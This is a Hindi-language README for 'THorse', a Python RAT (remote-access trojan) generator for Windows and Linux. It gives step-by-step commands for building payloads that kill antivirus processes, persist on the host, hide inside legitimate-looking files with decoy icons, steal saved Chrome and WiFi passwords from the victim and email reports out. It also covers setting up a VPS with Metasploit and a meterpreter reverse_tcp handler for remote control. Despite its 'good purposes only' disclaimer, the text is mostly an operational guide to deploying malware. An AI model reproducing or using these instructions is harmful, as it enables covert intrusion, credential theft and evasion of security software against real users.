
THorse Python 3 में लिखा गया Windows/Linux सिस्टम के लिए एक RAT (रिमोट एडमिनिस्ट्रेटर ट्रोजन) जनरेटर है।
THorse एक RAT (Remote Administrator Trojan) जनरेटर है जो Windows/Linux सिस्टम के लिए Python 3 में लिखा गया है।
यह छोटा python स्क्रिप्ट वास्तव में शानदार काम कर सकता है।
:computer: यह प्रोजेक्ट केवल अच्छे उद्देश्यों और व्यक्तिगत उपयोग के लिए बनाया गया था।
यह सॉफ्टवेयर "जैसा है" किसी भी प्रकार की वारंटी के बिना प्रदान किया जाता है। आप इस सॉफ्टवेयर का उपयोग अपने जोखिम पर कर सकते हैं। उपयोग की पूरी जिम्मेदारी अंतिम उपयोगकर्ता की है। डेवलपर्स कोई देयता नहीं मानते हैं और इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
| समर्थित पुनर्प्राप्तियाँ, सहेजे गए पासवर्ड कहाँ से प्राप्त करने का प्रयास करता है : |
|---|
| Chrome ब्राउज़र |
| WiFi |
हम सभी जानते हैं कि Meterpreter पेलोड कितना शक्तिशाली है, लेकिन फिर भी इससे बना पेलोड संतोषजनक नहीं है।
विंडोज में, कृपया paygen.py में Pyinstaller पथ निर्दिष्ट/सेट करें [पंक्ति 14]
डिफ़ॉल्ट पथ यह है : PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")
इसे अपने सिस्टम के अनुसार बदलें
# निर्भरताएँ स्थापित करें
$ Install latest python 3.x
# /opt निर्देशिका पर जाएं (वैकल्पिक)
$ cd /opt/
# इस रिपॉजिटरी को क्लोन करें
$ git clone https://github.com/PushpenderIndia/thorse.git
# रिपॉजिटरी में जाएं
$ cd thorse
# निर्भरताएँ स्थापित करना
$ bash installer_linux.sh
# यदि installer_linux.sh निष्पादित करते समय कोई त्रुटि आती है, तो installer_linux.py का उपयोग करके स्थापित करने का प्रयास करें
$ python3 installer_linux.py
$ chmod +x paygen.py
$ python3 paygen.py --help
# पेलोड/RAT बनाना
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path
# कस्टम AVKiller के साथ पेलोड/RAT बनाना [डिफ़ॉल्ट रूप से, Kill_Targets में टनों ज्ञात एंटीवायरस जोड़े जाते हैं]
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe
# स्थायी होने के लिए कस्टम समय के साथ पेलोड/RAT बनाना
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10
नोट: आप आइकन फ़ोल्डर से हमारे कस्टम आइकन का भी उपयोग कर सकते हैं, बस उन्हें इस तरह उपयोग करें --icon icon/pdf.ico
# 1. एक VPS सेटअप करें, आप किसी भी VPS प्रदाता जैसे Digital Ocean, Linode, AWS आदि से Ubuntu VPS खरीद सकते हैं
# 2. SSH का उपयोग करके अपने VPS से कनेक्ट करें
$ ssh username@ip_address
# 3. अपने Linux VPS को अपडेट करें
$ sudo apt update
# 4. Kali Linux रिपॉजिटरी जोड़ें
$ sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"
# 5. gnupg पैकेज स्थापित करें
$ sudo apt install gnupg
# 6. Kali पब्लिक कीज़ जोड़ें
$ wget 'https://archive.kali.org/archive-key.asc' && sudo apt-key add archive-key.asc
# 7. VPS अपडेट करें
$ sudo apt update
# 8. Kali प्राथमिकता सेट करें
$ sudo sh -c "echo 'Package: *'>/etc/apt/preferences.d/kali.pref; echo 'Pin: release a=kali-rolling'>>/etc/apt/preferences.d/kali.pref; echo 'Pin-Priority: 50'>>/etc/apt/preferences.d/kali.pref"
# 9. VPS अपडेट करें
$ sudo apt update
# 10. VPS में Metasploit Framework स्थापित करें
$ sudo apt install -t kali-rolling metasploit-framework
# नोट: उपरोक्त चरण केवल एक बार करने की आवश्यकता है
# 11. pip3 स्थापित करें
$ sudo apt install python3-pip
# 12. इस रिपॉजिटरी को क्लोन करें
$ git clone https://github.com/PushpenderIndia/thorse.git
# 13. रिपॉजिटरी में जाएं
$ cd thorse
# 14. निर्भरताएँ स्थापित करना
$ bash installer_linux.sh
# 15. यदि installer_linux.sh निष्पादित करते समय कोई त्रुटि आती है, तो installer_linux.py का उपयोग करके स्थापित करने का प्रयास करें
$ python3 installer_linux.py
$ 16. chmod +x paygen.py
$ python3 paygen.py --help
# पेलोड/RAT बनाना (यदि आप Windows के लिए RAT कंपाइल करना चाहते हैं, तो Windows मशीन पर RAT बनाएं और VPS का उपयोग RAT को दूरस्थ रूप से नियंत्रित करने के लिए करें)
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path
# कस्टम AVKiller के साथ पेलोड/RAT बनाना [डिफ़ॉल्ट रूप से, Kill_Targets में टनों ज्ञात एंटीवायरस जोड़े जाते हैं]
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe
# स्थायी होने के लिए कस्टम समय के साथ पेलोड/RAT बनाना
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10
नोट: आप आइकन फ़ोल्डर से हमारे कस्टम आइकन का भी उपयोग कर सकते हैं, बस उन्हें इस तरह उपयोग करें --icon icon/pdf.ico
# निर्भरताएँ स्थापित करें
$ Install latest python 3.x
# इस रिपॉजिटरी को क्लोन करें
$ git clone https://github.com/PushpenderIndia/thorse.git
# रिपॉजिटरी में जाएं
$ cd thorse
# निर्भरताएँ स्थापित करना
$ python -m pip install -r requirements.txt
# paygen.py को टेक्स्ट एडिटर में खोलें और पंक्ति 15 कॉन्फ़िगर करें, Pyinstaller पथ सेट करें, डिफ़ॉल्ट पथ इस प्रकार है:-
# PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")
# सहायता मेनू प्राप्त करना
$ python paygen.py --help
# पेलोड/RAT बनाना
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path
# कस्टम AVKiller के साथ पेलोड/RAT बनाना [डिफ़ॉल्ट रूप से, Kill_Targets में टनों ज्ञात एंटीवायरस जोड़े जाते हैं]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe
# पेलोड/RAT को वैध फ़ाइल [कोई भी फ़ाइल .exe, .pdf, .txt आदि] के साथ बाइंड करके बनाना
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon/txt.ico --bind passwords.txt
नोट: आप आइकन फ़ोल्डर से हमारे कस्टम आइकन का भी उपयोग कर सकते हैं, बस उन्हें इस तरह उपयोग करें --icon icon/pdf.ico
$ sudo msfconsole
msf3> use exploit/multi/handler
msf3> set payload python/meterpreter/reverse_tcp
msf3> set LHOST 192.168.43.221
msf3> set LPORT 443
msf3> run








वर्तमान में इस रिपॉजिटरी का रखरखाव मेरे (Pushpender Singh) द्वारा किया जा रहा है। लेकिन यदि आप योगदानकर्ता बनना चाहते हैं, तो कुछ अच्छी सुविधा जोड़ें और एक पुल रिक्वेस्ट बनाएं, मैं इसकी समीक्षा करूंगा और इसे इस रिपॉजिटरी में मर्ज कर दूंगा।
सभी योगदानकर्ताओं के पुल रिक्वेस्ट स्वीकार किए जाएंगे यदि उनका पुल रिक्वेस्ट इस रिपॉजिटरी के लिए योग्य है।
किसी भी टेक्स्ट एडिटर के साथ ऑटोस्टार्ट फ़ाइल खोलें, ऑटोस्टार्ट फ़ाइल पथ: ~/.config/autostart/xinput.desktop
इन 5 पंक्तियों को हटाएं:
[Desktop Entry]
Type=Application
X-GNOME-Autostart-enabled=true
Name=Xinput
Exec="destination_file_name"
नोट: destination_file_name वह दुर्भावनापूर्ण फ़ाइल का नाम है जो आपने अपने TrojanHorse को -o पैरामीटर का उपयोग करके दिया था
अपने सिस्टम को रीबूट करें और फिर इस नीचे दिए गए पथ पर संग्रहीत दुर्भावनापूर्ण फ़ाइल को हटा दें
गंतव्य पथ, जहाँ TrojanHorse संग्रहीत है : ~/.config/xnput
किसी भी प्रकार का योगदान स्वागत है!
नोट: यदि आपको योगदानकर्ताओं की सूची में होना चाहिए लेकिन हम आपको भूल गए, तो कृपया हमें बताएं!
| शॉर्ट हैंड | फुल हैंड | विवरण |
|---|
| -h | --help | यह सहायता संदेश दिखाएं और बाहर निकलें |
| -k KILL_AV | --kill_av KILL_AV | एंटीवायरसकिलर : उस AV के .exe को निर्दिष्ट करें जिसे मारने की आवश्यकता है। उदा:- --kill_av cmd.exe |
| -t TIME_IN_SECONDS | --persistence TIME_PERSISTENT | __ सेकंड के बाद स्थायी हो जाता है। डिफ़ॉल्ट=10 |
| -w | --windows | Windows निष्पादन योग्य उत्पन्न करें। |
| -l | --linux | Linux निष्पादन योग्य उत्पन्न करें। |
| -b file.txt | --bind LEGITIMATE_FILE_PATH.pdf | AutoBinder : वैध फ़ाइल का पथ निर्दिष्ट करें। [समर्थित OS : Windows] |
| -s | --steal-password | पीड़ित मशीन से सहेजा गया पासवर्ड चुराएं [समर्थित OS : Windows] |
| -d | --debug | वायरस को फोरग्राउंड में चलाएं |
| शॉर्ट हैंड | फुल हैंड | विवरण |
|---|
| --icon ICON | आइकन पथ निर्दिष्ट करें, दुर्भावनापूर्ण फ़ाइल का आइकन [नोट : .ico होना चाहिए] | |
| --ip IP_ADDRESS | रिपोर्ट भेजने के लिए ईमेल पता। | |
| --port PORT | --ip तर्क में दिए गए IP पते का पोर्ट। | |
| -e EMAIL | --email EMAIL | रिपोर्ट भेजने के लिए ईमेल पता। |
| -p PASSWORD | --password PASSWORD | -e तर्क में दिए गए ईमेल पते का पासवर्ड। |
| -o OUT | --out OUT | आउटपुट फ़ाइल नाम। |